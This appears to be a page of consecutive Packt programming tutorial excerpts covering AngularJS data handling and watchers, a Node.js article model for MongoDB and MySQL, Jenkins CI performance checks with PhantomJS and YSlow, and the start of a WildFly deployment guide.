This example shows us that ModelForms can save a lot of time in development by having a form that can be customized (by modifying the validation, for example). Summary This article discussed Django forms. It explained how to create forms with Django and how to process them. Resources for Article: Further resources on this subject: So, what is Django? [article] Creating an Administration Interface in Django [article] Django Debugging Overview [article]

Working with Live Data and AngularJS

Packt
12 Jun 2014
14 min read
(For more resources related to this topic, see here.) Big Data is a new field that is growing every day. HTML5 and JavaScript applications are being used to showcase these large volumes of data in many new, interesting ways. Some of the latest client implementations are being accomplished with libraries such as AngularJS. This is because of its ability to efficiently handle and organize data in many forms. Making business-level decisions based on real-time data is a revolutionary concept. Humans have only been able to fathom metrics based on large-scale systems, in real time, for the last decade at most. During this time, the technology to collect large amounts of data has grown tremendously, but the high-level applications that use this data are only just catching up. Anyone can collect large amounts of data with today's complex distributed systems. Displaying this data in different formats that allow any level of user to digest and understand its meaning is currently the main portion of what the leading-edge technology is trying to accomplish. There are so many different formats that raw data can be displayed in. The trick is to figure out the most efficient ways to showcase patterns and trends, which allow for more accurate business-level decisions to be made. We live in a fast-paced world where everyone wants something done in real time. Load times must be in milliseconds, new features are requested daily, and deadlines get shorter and shorter. The Web gives companies the ability to generate revenue from a completely new market, and AngularJS is on the leading edge. This new market creates many new requirements for HTML5 applications. JavaScript applications are becoming commonplace in major companies. These companies are using JavaScript to showcase many different types of data, from inward to outward facing products. Working with live data sets in client-side applications is a common practice and is the real-world standard. Most of the applications today use some type of live data to accomplish a given set of tasks. These tasks rely on this data to render views that the user can visualize and interact with. There are many advantages of working with the Web for data visualization, and we are going to showcase how these tie into an AngularJS application. AngularJS offers different methods to accomplish a view that is in charge of elegantly displaying large amounts of data in very flexible and snappy formats. Some of these methods feed directives data that has been requested and resolved, while others allow the directive to maintain control of the requests. We will go over these different techniques of how to efficiently get live data into the view layer by creating different real-world examples. We will also go over how to properly test directives that rely on live data to achieve their view successfully. Techniques that drive directives Most standard data requirements for a modern application involve an entire view that depends on a set of data. This data should be dependent on the current state of the application. The state can be determined in different ways. A common tactic is to build URLs that replicate a snapshot of the application's state. This can be done with a combination of URL paths and parameters. URL paths and parameters are what you will commonly see change when you visit a website and start clicking around. An AngularJS application is made up of different route configurations that use the URL to determine which action to take.
Each configuration has an associated controller, template, and other options, and these configurations work in unison to get data into the application in the most efficient way. AngularUI also offers its own routing system. This UI-Router is a simple system built on complex concepts, which allows nested views to be controlled by different state options. It yields the same result as ngRoute, which is to get data into the controller, but it does so in a more eloquent way that creates more options. AngularJS 2.0 is expected to contain a hybrid router that utilizes the best of each.

Once the controller gets the data, it feeds it to the template views. The template holds the directives that perform the view-layer functionality. Because the controller feeds the directives their data, the directives rely on the controllers to be in charge of that data. The data can either be fed immediately after the route configurations are executed, or the application can wait for the data to be resolved. AngularJS lets us make sure that data requests have completed successfully before any controller logic is executed. This technique is called resolving data, and it is used by adding resolve functions to the route configurations. It allows us to write the business logic in the controller in a synchronous manner, without having to write callbacks, which can be counter-intuitive.

The XHR extensions of AngularJS are built using promise objects. A promise object is essentially a way to ensure that data has been successfully retrieved, or to verify whether an error has occurred. Since JavaScript embraces callbacks at its core, there are many points of failure with respect to the timing of when data is ready to be worked with. This is where libraries such as the Q library come into play. The promise object allows the execution thread to resemble a more synchronous flow, which reduces complexity and increases readability.

The $q library

The $q factory is a lite instantiation of the formally accepted Q library (https://github.com/kriskowal/q). This lite package contains only the functions needed to defer JavaScript callbacks asynchronously, based on the specifications provided by the Q library. The benefits of using this object are immense when working with live data. Basically, the $q library allows a JavaScript application to mimic synchronous behavior when dealing with asynchronous data requests or methods that are not thread-blocking by nature. This means that we can write our application's logic in a way that follows a synchronous flow. ES6 (ECMAScript 6) incorporates promises at its core, which will eventually remove the need for many functions inside the $q library, or the entire library itself, in AngularJS 2.0.

The core AngularJS service related to CRUD operations is called $http. This service uses the $q library internally, so the power of promises is available anywhere a data request is made. Here is an example of a service that uses the $q object to create an easy way to resolve data in a controller. Refer to the following code:

this.getPhones = function() {
  var request = $http.get('phones.json'),
      promise;

  promise = request.then(function(response) {
    return response.data;
  }, function(errorResponse) {
    // note: returning a plain value here converts the rejection into a
    // resolution; return $q.reject(errorResponse) to propagate the failure
    return errorResponse;
  });

  return promise;
};

Here, we can see that the phoneService function uses the $http service to request all of the phones.
The phoneService function creates a request object whose then function returns a promise object. This promise object is returned synchronously. Once the data is ready, the then function is called and the correct data response is returned. This service is best showcased in conjunction with a resolve function that feeds data into a controller. The resolve function accepts the returned promise object and only allows the controller to be executed once all of the phones have been resolved or rejected.

The rest of the code needed for this example is the application's configuration code. The config process is executed on the initialization of the application, and this is where the resolve function is implemented. Refer to the following code:

var app = angular.module('angularjs-promise-example', ['ngRoute']);

app.config(function($routeProvider) {
  $routeProvider.when('/', {
    controller: 'PhoneListCtrl',
    templateUrl: 'phoneList.tpl.html',
    resolve: {
      phones: function(phoneService) {
        return phoneService.getPhones();
      }
    }
  }).otherwise({
    redirectTo: '/'
  });
});

app.controller('PhoneListCtrl', function($scope, phones) {
  $scope.phones = phones;
});

A live example of this basic application can be found at http://plnkr.co/edit/f4ZDCyOcud5WSEe9L0GO?p=preview.

Directives take over once the controller executes its initial context. This is where the $compile function goes through all of its stages and links directives to the controller's template. The controller is still in charge of driving the data that sits inside the template view, which is why it is important for directives to know what to do when their data changes.

How should data be watched for changes?

Most directives are on a need-to-know basis about how the data driving their view is retrieved. This separation of logic reduces cyclomatic complexity in an application. Controllers should be in charge of requesting data and passing it to directives through their associated $scope object; directives should be in charge of creating DOM based on the data they receive, and of reacting when that data changes. There are an infinite number of things a directive might do once it receives its data. Our goal is to showcase how to watch live data for changes, and how to make sure this works at scale, so that our directives have the opportunity to fulfill their specific tasks.

There are three built-in ways to watch data in AngularJS. Directives use the following methods to carry out specific tasks based on the different conditions set in the source of the program:

Watching an object's identity for changes
Recursively watching all of the object's properties for changes
Watching just the top level of an object's properties for changes

Each of these methods has its own specific purpose. The first method can be used if the variable being watched is a primitive type. The second method is used for deep comparisons between objects. The third is used to do a shallow watch on an array of any type, or on a plain object. Let's look at an example that exercises the last two watcher types, using jsPerf to benchmark our logic. We are leaving the first watcher out of the benchmark because it only watches primitive types, and we will be watching many objects for different levels of equality.
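For reference, though, here is a minimal sketch of that first method, an identity watch on a primitive scope value (this controller is hypothetical and is not part of the jsPerf test that follows):

// an identity watch on a primitive; cheap, because AngularJS only
// compares the old and new values with ===
app.controller('CounterCtrl', function($scope) {
  $scope.count = 0;

  $scope.$watch('count', function(newVal, oldVal) {
    if (newVal !== oldVal) {
      console.log('count changed from ' + oldVal + ' to ' + newVal);
    }
  });
});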
This example sets the $scope variable in the app's run function, because we want to make sure that the jsPerf test resets each data set upon initialization. Refer to the following code:

app.run(function($rootScope) {
  $rootScope.data = [
    {'bob': true}, {'frank': false}, {'jerry': 'hey'}, {'bargle': false},
    {'bob': true}, {'bob': true}, {'frank': false}, {'jerry': 'hey'},
    {'bargle': false}, {'bob': true}, {'bob': true}, {'frank': false}
  ];
});

This run function sets up the data object that we will watch for changes. It will be constant throughout every test we run and will be reset to this form at the beginning of each test.

Doing a deep watch on $rootScope.data

This watch function does a deep watch on the data object; the true flag is the key to setting off a deep watch. The purpose of a deep comparison is to go through every object property and compare it for changes on every digest. This is an expensive function and should be used only when necessary. Refer to the following code:

app.service('Watch', function($rootScope) {
  return {
    run: function() {
      $rootScope.$watch('data', function(newVal, oldVal) {
      }, true);
      // the digest is here because of the jsPerf test; we are using this
      // run function to mimic a real environment
      $rootScope.$digest();
    }
  };
});

Doing a shallow watch on $rootScope.data

The shallow watch is called whenever a top-level object is changed in the data object. This is less expensive because the application does not have to traverse n levels of data. Refer to the following code:

app.service('WatchCollection', function($rootScope) {
  return {
    run: function() {
      $rootScope.$watchCollection('data', function(n, o) {
      });
      $rootScope.$digest();
    }
  };
});

During each individual test, we get each watcher service and call its run function. This fires the watcher on initialization, and then we push another test object onto the data array, which fires the watcher's trigger function again. That is the end of the test. We are using jsperf.com to show the results. Note that the watchCollection function is much faster and should be used in cases where a shallow watch of the object is acceptable. The example can be found at http://jsperf.com/watchcollection-vs-watch/5.

This test implies that the watchCollection function is the better choice for watching an array of objects that can be shallow watched for changes. The same holds for an array of strings, integers, or floats. This brings up further questions, such as the following:

Does our directive depend on a deep watch of the data?
Do we want to use the $watch function, even though it is slow and memory-intensive?
Is it possible to use the $watch function if we are using large data objects?

The directives used in this book so far have used the watch function to watch data directly, but there are other methods to update the view if our directives depend on deep watchers and very large data sets.
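One such method, shown here as an illustrative sketch rather than something from the original example, is to watch a cheap derived value instead of deep watching the data itself, for example the array's length, or a version counter that the controller increments whenever it mutates the data:

// watch the array's length instead of its contents; renderView is a
// hypothetical function that redraws the directive's DOM
$scope.$watch('data.length', function(newLen, oldLen) {
  if (newLen !== oldLen) { renderView($scope.data); }
});

// or: bump a counter in the controller after every mutation, and let the
// directive watch that single primitive value
$scope.dataVersion = 0;
$scope.$watch('dataVersion', function() { renderView($scope.data); });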
Directives can be in charge

Some libraries take the position that elements can be in charge of when they should request data. Polymer (http://www.polymer-project.org/) is a JavaScript library that allows DOM elements to control how data is requested, in a declarative format. This is a slight shift from the processes covered so far in this article regarding what directives are meant for and how they should receive data. Let's come up with a use case that could justify this type of behavior: a page that has many widgets on it.

A widget is a directive that needs a set of large data objects to render its view. To be more specific, let's say we want to show a catalog of phones. Each phone has a very large amount of data associated with it, and we want to display this data in a clean, simple way. Since watching large data sets can be very expensive, what will allow directives to always have the data they require, depending on the state of the application?

One option is not to use the controller to resolve the big data set and inject it into a directive, but rather to use the controller to request directive configurations that tell the directive to request certain data objects itself. Some people would say this goes against normal conventions, but it is necessary when dealing with many widgets in the same view that individually deal with large amounts of data. This method of using directives to determine when data requests should be made is only suggested if many widgets on a page depend on large data sets. To create this in a real-life example, let's take the phoneService function created earlier and add a new method to it called getPhone. Refer to the following code:

this.getPhone = function(config) {
  return $http.get(config.url);
};

Now, instead of requesting all the details on the initial call, the original getPhones method only needs to return phone objects with a name and an id value. This allows the application to request the details on demand. We do not need to alter the getPhones method that was created earlier; we only need to alter the data that is supplied when the request is made. It should be noted that any directive that requests data should be tested to prove that it requests the correct data at the right time.

Testing directives that control data

Since the controller is usually in charge of how data is incorporated into the view, many directives do not have to be coupled with logic related to how that data is retrieved. Keeping things separate is always good and is encouraged, but in some cases it is necessary for directives and XHR logic to be used together. When these use cases reveal themselves in production, it is important to test them properly.

The tests in this book use two very generic steps to prove business logic:

Create, compile, and link DOM to the AngularJS digest cycle
Test scope variables and DOM interactions for correct outputs

Now we will add one more step to the process, which lies between those two:

Make sure all data communication is fired correctly

AngularJS makes it very simple to add this resource-related logic, because it ships with a built-in backend service mock that offers many different ways to create fake endpoints that return structured data. The service is called $httpBackend.
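As a sketch of what such a test might look like, consider the following hypothetical Jasmine spec. It assumes angular-mocks is loaded and that a phone-widget directive (not defined in this excerpt) fetches its own data from the URL it is configured with:

describe('phoneWidget', function () {
  var $httpBackend, $rootScope, $compile;

  beforeEach(module('angularjs-promise-example'));
  beforeEach(inject(function (_$httpBackend_, _$rootScope_, _$compile_) {
    $httpBackend = _$httpBackend_;
    $rootScope = _$rootScope_;
    $compile = _$compile_;
  }));

  it('requests the phone details it was configured with', function () {
    // fail the test if the directive asks for anything other than phone1.json
    $httpBackend.expectGET('phone1.json').respond({ name: 'Nexus' });

    var element = $compile('<phone-widget url="phone1.json"></phone-widget>')($rootScope);
    $rootScope.$digest();
    $httpBackend.flush(); // answers the pending request with the fake data

    expect(element.text()).toContain('Nexus');
    $httpBackend.verifyNoOutstandingExpectation();
    $httpBackend.verifyNoOutstandingRequest();
  });
});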

Selecting and initializing the database

Packt
10 Jun 2014
7 min read
(For more resources related to this topic, see here.)

A NoSQL database is simpler than a SQL database, and it very often stores information as key-value pairs. Such solutions are usually used when handling and storing large amounts of data. NoSQL is also a very popular approach when we need a flexible schema or when we want to work with JSON. Whether MySQL or MongoDB is the better choice really depends on the kind of system we are building; in our example blog, we're going to use both. In order to do this, we will need a layer that connects to the database server and accepts queries. To make things a bit more interesting, we will create a module that has only one API but can switch between the two database models.

Using NoSQL with MongoDB

Let's start with MongoDB. Before we start storing information, we need a MongoDB server running. It can be downloaded from the official page of the database, https://www.mongodb.org/downloads.

We are not going to handle the communication with the database manually. There is a driver specifically developed for Node.js. It's called mongodb and we should include it in our package.json file. After successful installation via npm install, the driver will be available in our scripts. We can check this as follows:

"dependencies": {
  "mongodb": "1.3.20"
}

We will stick to the Model-View-Controller architecture and keep the database-related operations in a model called Articles. We can see this as follows:

var crypto = require("crypto"),
    type = "mongodb",
    client = require('mongodb').MongoClient,
    mongodb_host = "127.0.0.1",
    mongodb_port = "27017",
    collection;

module.exports = function() {
  if (type == "mongodb") {
    return {
      add: function(data, callback) { ... },
      update: function(data, callback) { ... },
      get: function(callback) { ... },
      remove: function(id, callback) { ... }
    };
  } else {
    return {
      add: function(data, callback) { ... },
      update: function(data, callback) { ... },
      get: function(callback) { ... },
      remove: function(id, callback) { ... }
    };
  }
};

It starts by defining a few dependencies and settings for the MongoDB connection. The first line requires the crypto module, which we will use to generate unique IDs for every article. The type variable defines which database is currently in use. The third line initializes the MongoDB driver, which we will use to communicate with the database server. After that, we set the host and port for the connection, and finally a global collection variable, which will keep a reference to the collection of articles. In MongoDB, collections are similar to the tables in MySQL.

The next logical step is to establish a database connection and perform the needed operations, as follows:

connection = 'mongodb://';
connection += mongodb_host + ':' + mongodb_port;
connection += '/blog-application';

client.connect(connection, function(err, database) {
  if (err) {
    throw new Error("Can't connect");
  } else {
    console.log("Connection to MongoDB server successful.");
    collection = database.collection('articles');
  }
});

We pass the host and the port, and the driver does everything else. Of course, it is good practice to handle the error (if any) and throw an exception. In our case, this is especially important because without the information in the database, the frontend has nothing to show.
The rest of the module contains methods to add, edit, retrieve, and delete records:

return {
  add: function(data, callback) {
    var date = new Date();
    data.id = crypto.randomBytes(20).toString('hex');
    // getMonth() is zero-based, so add 1 to store the calendar month
    data.date = date.getFullYear() + "-" + (date.getMonth() + 1) + "-" + date.getDate();
    collection.insert(data, {}, callback || function() {});
  },
  update: function(data, callback) {
    // the query key must match the stored property, which is lowercase "id"
    collection.update(
      {id: data.id},
      data,
      {},
      callback || function() {}
    );
  },
  get: function(callback) {
    collection.find({}).toArray(callback);
  },
  remove: function(id, callback) {
    collection.findAndModify(
      {id: id},
      [],
      {},
      {remove: true},
      callback
    );
  }
};

The add and update methods accept the data parameter. That's a simple JavaScript object, for example:

{
  title: "Blog post title",
  text: "Article's text here ..."
}

The records are identified by an automatically generated unique id. The update method needs it in order to find out which record to edit. All the methods also have a callback. That's important, because the module is meant to be used as a black box: we should be able to create an instance of it, operate on the data, and then continue with the rest of the application's logic.
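To illustrate how that black box is meant to be consumed, here is a minimal usage sketch. The require path is an assumption, and it relies on the MongoDB branch, where the get callback receives (err, docs):

// minimal usage sketch, assuming the module above lives in models/Articles.js
var Articles = require('./models/Articles')();

Articles.add({
  title: "Blog post title",
  text: "Article's text here ..."
}, function (err) {
  if (err) { return console.error("Insert failed:", err); }
  Articles.get(function (err, articles) {
    if (err) { return console.error("Fetch failed:", err); }
    console.log(articles); // every stored article, ready for the frontend
  });
});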
Using MySQL

We're going to use an SQL type of database with MySQL. We will add a few more lines of code to the already working Articles.js model. The idea is to have a class that supports the two databases as two different options; at the end, we should be able to switch from one to the other by simply changing the value of a variable. As with MongoDB, we first need to install the database to be able to use it. The official download page is http://www.mysql.com/downloads.

MySQL requires another Node.js module, which should also be added to the package.json file. We can see the module as follows:

"dependencies": {
  "mongodb": "1.3.20",
  "mysql": "2.0.0"
}

As with the MongoDB solution, we need to first connect to the server. To do so, we need to know the values of the host, username, and password fields, and, because the data is organized in databases, the name of the database. The following code defines the needed variables:

var mysql = require('mysql'),
    mysql_host = "127.0.0.1",
    mysql_user = "root",
    mysql_password = "",
    mysql_database = "blog_application",
    connection;

The previous example leaves the password field empty, but we should set the proper value for our system. Unlike MongoDB, MySQL requires us to define a table and its fields before we start saving data. So, consider the following code:

CREATE TABLE IF NOT EXISTS `articles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` longtext NOT NULL,
  `text` longtext NOT NULL,
  `date` varchar(100) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;

Once we have a database and its table set up, we can continue with the database connection, as follows:

connection = mysql.createConnection({
  host: mysql_host,
  user: mysql_user,
  password: mysql_password
});

connection.connect(function(err) {
  if (err) {
    throw new Error("Can't connect to MySQL.");
  } else {
    connection.query("USE " + mysql_database, function(err, rows, fields) {
      if (err) {
        throw new Error("Missing database.");
      } else {
        console.log("Successfully selected database.");
      }
    });
  }
});

The driver provides a method to connect to the server and execute queries. The first executed query selects the database. If everything is ok, you should see Successfully selected database as output in your console. Half of the job is done.

What we should do now is replicate the methods returned by the MongoDB implementation. We need to do this because, when we switch to MySQL, the code using the class would otherwise not work. By replicating them, we mean that they should have the same names and accept the same arguments. If we do everything correctly, at the end our application will support two types of databases, and all we have to do is change the value of the type variable:

return {
  add: function(data, callback) {
    var date = new Date();
    var query = "";
    query += "INSERT INTO articles (title, text, date) VALUES (";
    query += connection.escape(data.title) + ", ";
    query += connection.escape(data.text) + ", ";
    // getMonth() is zero-based here as well, so add 1
    query += "'" + date.getFullYear() + "-" + (date.getMonth() + 1) + "-" + date.getDate() + "'";
    query += ")";
    connection.query(query, callback);
  },
  update: function(data, callback) {
    var query = "UPDATE articles SET ";
    query += "title=" + connection.escape(data.title) + ", ";
    query += "text=" + connection.escape(data.text) + " ";
    // escape the id as well, so the WHERE clause is safe from injection
    query += "WHERE id=" + connection.escape(data.id);
    connection.query(query, callback);
  },
  get: function(callback) {
    var query = "SELECT * FROM articles ORDER BY id DESC";
    connection.query(query, function(err, rows, fields) {
      if (err) {
        throw new Error("Error getting.");
      } else {
        callback(rows);
      }
    });
  },
  remove: function(id, callback) {
    var query = "DELETE FROM articles WHERE id=" + connection.escape(id);
    connection.query(query, callback);
  }
};

The code is a little longer than the MongoDB variant because we needed to construct MySQL queries from the passed data. Keep in mind that we have to escape the information that comes into the module; that's why we use connection.escape(). With these lines of code, our model is complete. Now we can add, edit, remove, or get data.

Summary

In this article, we saw how to select and initialize a database, using NoSQL with MongoDB and using MySQL, as required for writing a blog application with Node.js and AngularJS.

Resources for Article:
Further resources on this subject:
So, what is Node.js? [Article]
Understanding and Developing Node Modules [Article]
An Overview of the Node Package Manager [Article]

Automating performance analysis with YSlow and PhantomJS

Packt
10 Jun 2014
12 min read
(For more resources related to this topic, see here.)

Getting ready

To run this article, the phantomjs binary will need to be accessible to the continuous integration server, which may not necessarily share the same permissions or PATH as our user. We will also need a target URL. We will use the PhantomJS port of the YSlow library to execute the performance analysis on our target web page. The YSlow library must be installed somewhere on the filesystem that is accessible to the continuous integration server. For our example, we have placed the yslow.js script in the tmp directory of the jenkins user's home directory. To find the jenkins user's home directory on a POSIX-compatible system, first switch to that user using the following command:

sudo su - jenkins

Then print the home directory to the console using the following command:

echo $HOME

We will need a continuous integration server set up where we can configure the jobs that will execute our automated performance analyses. The example that follows uses the open source Jenkins CI server. Jenkins CI is too large a subject to introduce here, but this article does not assume any working knowledge of it. For information about Jenkins CI, including basic installation or usage instructions, or to obtain a copy for your platform, visit the project website at http://jenkins-ci.org/. Our article uses version 1.552.

The combination of PhantomJS and YSlow is in no way unique to Jenkins CI. The example aims to provide a clear illustration of automated performance testing that can easily be adapted to any number of continuous integration server environments. The article also uses several plugins on Jenkins CI to help facilitate our automated testing. These plugins include:

Environment Injector Plugin
JUnit Attachments Plugin
TAP Plugin
xUnit Plugin

To run the demo site, we must have Node.js installed. In a separate terminal, change to the phantomjs-sandbox directory (in the sample code's directory), and start the app with the following command:

node app.js

How to do it…

To execute our automated performance analyses in Jenkins CI, the first thing that we need to do is set up the job as follows:

1. Select the New Item link in Jenkins CI. Give the new job a name (for example, YSlow Performance Analysis), select Build a free-style software project, and then click on OK.
2. To ensure that the performance analyses are automated, we enter a Build Trigger for the job. Check off the appropriate Build Trigger and enter details about it. For example, to run the tests every two hours, during business hours, Monday through Friday, check Build periodically and enter the Schedule as H 9-16/2 * * 1-5.
3. In the Build block, click on Add build step and then click on Execute shell.
4. In the Command text area of the Execute Shell block, enter the shell commands that we would normally type at the command line, for example:

phantomjs ${HOME}/tmp/yslow.js -i grade -threshold "B" -f junit http://localhost:3000/css-demo > yslow.xml

5. In the Post-build Actions block, click on Add post-build action and then click on Publish JUnit test result report.
6. In the Test report XMLs field of the Publish JUnit Test Result Report block, enter *.xml.
7. Lastly, click on Save to persist the changes to this job.

Our performance analysis job should now run automatically according to the specified schedule; however, we can always trigger it manually by navigating to the job in Jenkins CI and clicking on Build Now.
After a few of the performance analyses have completed, we can navigate to those jobs in Jenkins CI and see the results shown in the following screenshots:

The landing page for a performance analysis project in Jenkins CI: note the Test Result Trend graph with the successes and failures.

The Test Result report page for a specific build: note that the failed tests in the overall analysis are called out, and that we can expand specific items to view their details.

The All Tests view of the Test Result report page for a specific build: note that all tests in the performance analysis are listed here, regardless of whether they passed or failed, and that we can click into a specific test to view its details.

How it works…

The driving principle behind this article is that we want our continuous integration server to periodically and automatically execute the YSlow analyses for us so that we can monitor our website's performance over time. This way, we can see whether our changes are having an effect on overall site performance, receive alerts when performance declines, or even fail builds if we fall below our performance threshold.

The first thing that we do in this article is set up the build job. In our example, we set up a new job that was dedicated to the YSlow performance analysis task. However, these steps could be adapted such that the performance analysis task is added onto an existing multipurpose job.

Next, we configured when our job will run, adding a Build Trigger to run the analyses according to a schedule. For our schedule, we selected H 9-16/2 * * 1-5, which runs the analyses every two hours, during business hours, on weekdays. While the schedule that we used is fine for demonstration purposes, we should carefully consider the needs of our project; chances are that a different Build Trigger will be more appropriate. For example, it may make more sense to select Build after other projects are built, and to have the performance analyses run only after the new code has been committed, built, and deployed to the appropriate QA or staging environment. Another alternative would be to select Poll SCM and to have the performance analyses run only after Jenkins CI detects new changes in source control.

With the schedule configured, we can apply the shell commands necessary for the performance analyses. As noted earlier, the Command text area accepts the text that we would normally type on the command line. Here we type the following:

phantomjs: the PhantomJS executable binary
${HOME}/tmp/yslow.js: the copy of the YSlow library accessible to the Jenkins CI user
-i grade: indicates that we want the "Grade" level of report detail
-threshold "B": indicates that we want to fail builds with an overall grade of "B" or below
-f junit: indicates that we want the results output in the JUnit format
http://localhost:3000/css-demo: our target URL
> yslow.xml: redirects the JUnit-formatted output to that file on the disk
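The yslow.js script itself is an ordinary PhantomJS script that parses these arguments, loads the target page, and prints a report. As a purely illustrative sketch of the same pattern (this is not the YSlow implementation), a minimal PhantomJS script that loads a page and reports its load time might look like this:

// check-load.js - an illustrative PhantomJS sketch, not the YSlow implementation
var system = require('system');
var page = require('webpage').create();
var url = system.args[1] || 'http://localhost:3000/css-demo';
var start = Date.now();

page.open(url, function (status) {
  if (status !== 'success') {
    console.log('FAIL: could not load ' + url);
    phantom.exit(1); // a non-zero exit code can be used to fail the CI build
  } else {
    console.log('ok - loaded ' + url + ' in ' + (Date.now() - start) + 'ms');
    phantom.exit(0);
  }
});

We would invoke it just like yslow.js, for example: phantomjs check-load.js http://localhost:3000/css-demo.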
What if PhantomJS isn't on the PATH for the Jenkins CI user?

A relatively common problem is that, although we have permission on Jenkins CI to set up new build jobs, we are not the server administrator. It is likely that PhantomJS is available on the same machine where Jenkins CI is running, but the jenkins user simply does not have the phantomjs binary on its PATH. In these cases, we should work with the person administering the Jenkins CI server to learn its path. Once we have the PhantomJS path, we can do the following: click on Add build step and then on Inject environment variables; drag-and-drop the Inject environment variables block to ensure that it is above our Execute shell block; and, in the Properties Content text area, prepend the PhantomJS binary's path to the PATH variable, as we would in any other script, as follows:

PATH=/path/to/phantomjs/bin:${PATH}

After setting the shell commands to execute, we jump into the Post-build Actions block and instruct Jenkins CI where it can find the JUnit XML reports. As our shell command redirects the output into a file that is directly in the workspace, it is sufficient to enter an unqualified *.xml here.

Once we have saved our build job in Jenkins CI, the performance analyses can begin right away! If we are impatient for our first round of results, we can click on Build Now for our job and watch as it executes the initial performance analysis. As the performance analyses run, Jenkins CI accumulates the results on the filesystem, keeping them until they are either manually removed or a discard policy removes old build information. We can browse these accumulated jobs in the web UI for Jenkins CI, clicking on the Test Result link to drill into them.

There's more…

The first thing that bears expanding upon is that we should be thoughtful about what we use as the target URL for our performance analysis job. The YSlow library expects a single target URL, and as such, it is not prepared to handle a performance analysis job that is otherwise configured to target two or more URLs. As such, we must select a strategy to compensate for this, for example:

Pick a representative page: We could manually go through our site and select the single page that we feel best represents the site as a whole. For example, we could pick the page that is "most average" compared to the other pages ("most pages will perform at about this level"), or the page that is most likely to be the worst performing page ("most pages will perform better than this"). With our representative page selected, we can then extrapolate performance for other pages from this specimen.

Pick a critical page: We could manually select the single page that is most sensitive to performance. For example, we could pick our site's landing page ("it is critical to optimize performance for first-time visitors"), or a product demo page ("this is where conversions happen, so this is where performance needs to be best"). Again, with our performance-sensitive page selected, we can optimize the general cases around the specific one.

Set up multiple performance analysis jobs: If we are not content to extrapolate site performance from a single specimen page, then we could set up multiple performance analysis jobs, one for each page on the site that we want to test. In this way, we could (conceivably) set up an exhaustive performance analysis suite. Unfortunately, the results will not roll up into one; however, once our site is properly tuned, we need only look for the telltale red ball of a failed build in Jenkins CI.

The second point worth considering is where we point PhantomJS and YSlow for the performance analysis, and how the target URL's environment affects our interpretation of the results. If we are comfortable running our performance analysis against our production deploys, then there is not much else to discuss: we are assessing exactly what needs to be assessed.
But if we are analyzing performance in production, then it's already too late: the slow code has already been deployed! If we have a QA or staging environment available to us, then this is potentially better; we can deploy new code to one of these environments for integration and performance testing before putting it in front of customers. However, these environments are likely to differ from production despite our best efforts. For example, though we may be doing everything else right, perhaps our staging server causes all traffic to come back from a single hostname, and thus we cannot properly mimic a CDN, nor can we use cookie-free domains. Do we lower our threshold grade? Do we deactivate or ignore these rules? How can we tell apart the false negatives from the real warnings? We should put some careful thought into this, but don't be disheartened: better to have results that are slightly off than to have no results at all!

Using TAP format

If JUnit-formatted results turn out to be unacceptable, there is also a TAP plugin for Jenkins CI. Test Anything Protocol (TAP) is a plain text-based report format that is relatively easy for both humans and machines to read. With the TAP plugin installed in Jenkins CI, we can easily configure our performance analysis job to use it. We would just make the following changes to our build job:

In the Command text area of our Execute shell block, we would enter the following command:

phantomjs ${HOME}/tmp/yslow.js -i grade -threshold "B" -f tap http://localhost:3000/css-demo > yslow.tap

In the Post-build Actions block, we would select Publish TAP Results instead of Publish JUnit test result report and enter yslow.tap in the Test results text field.

Everything else about using TAP instead of JUnit-formatted results is basically the same. The job will still run on the schedule we specify, Jenkins CI will still accumulate test results for comparison, and we can still explore the details of an individual test's outcomes. The TAP plugin also adds an additional link in the job for us, TAP Extended Test Results.

One thing worth pointing out about using TAP results is that it is much easier to set up a single job to test multiple target URLs within a single website. We can enter multiple tests in the Execute Shell block (separating them with the && operator) and then set our Test Results target to *.tap. This will conveniently combine the results of all our performance analyses into one.

Summary

In this article, we saw how to set up an automated performance analysis task on a continuous integration server (for example, Jenkins CI) using PhantomJS and the YSlow library.

Resources for Article:
Further resources on this subject:
Getting Started [article]
Introducing a feature of IntroJs [article]
So, what is Node.js? [article]

Running our first web application

Packt
21 May 2014
8 min read
(For more resources related to this topic, see here.)

The standalone/deployments directory, as in previous releases of JBoss Application Server, is the location used by end users to perform their deployments; applications placed there are automatically deployed into the server at runtime. The artifacts that can be deployed are as follows:

WAR (Web Application Archive): A JAR file used to distribute a collection of JSP (JavaServer Pages) files, servlets, Java classes, XML files, libraries, static web pages, and several other resources that make up a web application.

EAR (Enterprise Archive): A file format used by Java EE for packaging one or more modules within a single file.

JAR (Java Archive): A format used to package multiple Java classes.

RAR (Resource Adapter Archive): An archive file defined in the JCA specification as the valid format for the deployment of resource adapters on application servers. You can deploy a RAR file on the AS Java as a standalone component or as part of a larger application. In both cases, the adapter is available to all applications using a lookup procedure.

Deployment in WildFly uses marker files that can be identified quickly, both by us and by WildFly, to understand the status of an artifact, that is, whether it was deployed or not. A marker file always has the same name as the artifact it refers to, plus a suffix. For example, to mark my-first-app.war for deployment, a file named my-first-app.war.dodeploy is created in the deployment directory. Besides this marker, there are others, explained as follows:

dodeploy: This suffix is inserted by the user, and it tells the deployment scanner to deploy the indicated artifact. This marker is especially important for exploded deployments.

skipdeploy: This marker disables the autodeploy mode for the indicated artifact while the file is present in the deploy directory.

isdeploying: This marker is placed by the deployment scanner service to indicate that it has noticed a .dodeploy file or new or updated autodeploy content and is in the process of deploying it. The deployment scanner erases this file when the deployment process finishes.

deployed: This marker is created by the deployment scanner to indicate that the content was deployed into the runtime.

failed: This marker is created by the deployment scanner to indicate that the deployment process failed.

isundeploying: This marker is created by the deployment scanner when the .deployed file is deleted, and it indicates that the content is being undeployed. This marker is deleted when the undeployment completes.

undeployed: This marker is created by the deployment scanner to indicate that the content was undeployed from the runtime.

pending: This marker is placed by the deployment scanner service to indicate that it has noticed the need to deploy content but has not yet instructed the server to deploy it.

When we deploy our first application, we'll see some of these marker files, making it easier to understand their functions. To support learning, the small applications that I made are available on GitHub (https://github.com) and packaged using Maven (for further details about Maven, visit http://maven.apache.org/). To begin the deployment process, we perform a checkout of the first application. First of all, you need to install the Git client for Linux.
To do this, use the following command:

[root@wfly_book ~]# yum install git -y

Git is also necessary for the Maven installation, which in turn lets us package our first application. Maven can be downloaded from http://maven.apache.org/download.cgi. Once the download is complete, create a directory for the Maven installation and unzip the archive into it. In my case, I chose the folder /opt, as follows:

[root@wfly_book ~]# mkdir /opt/maven

Unzip the file into the newly created directory as follows:

[root@wfly_book maven]# tar -xzvf /root/apache-maven-3.2.1-bin.tar.gz
